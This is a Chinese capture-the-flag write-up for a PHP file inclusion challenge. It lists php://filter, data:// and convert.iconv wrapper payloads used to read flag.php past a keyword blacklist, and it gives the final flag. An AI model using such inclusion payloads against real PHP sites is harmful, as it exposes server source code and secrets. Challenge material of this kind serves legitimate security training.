攻防世界-题目名称-文件包含

进入环境

看到 include(),想到文件包含,用php伪协议

/?filename=php://filter/read=convert.base64-encode/resource=flag.php

do not hack!猜测可能是黑名单检测的敏感字符

输入单个字符串/?filename=base64

还是显示do not hack!

构造payload

/?filename=convert

可以推测base64在黑名单里面,还有string、read

构造payload

/?filename=data://text/plain,1234567

发现没有成功,成功应该返回1234567

考虑php://filter有没有过滤器可以用

把flag.php的内容从UCS-2LE.UCS转为UCS-2BE编码

构造payload

/?filename=php://filter?convert.iconv.UCS-2LE.UCS-2BE/resource=flag.php

还是不行,还有很多字符可以尝试,但是太耗时间了,直接burp里面尝试爆破

开始攻击,在结果里面找flag

或者直接设置payload

cyberpeace{090804bb1d2cca98136f9b1da4d40d01}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值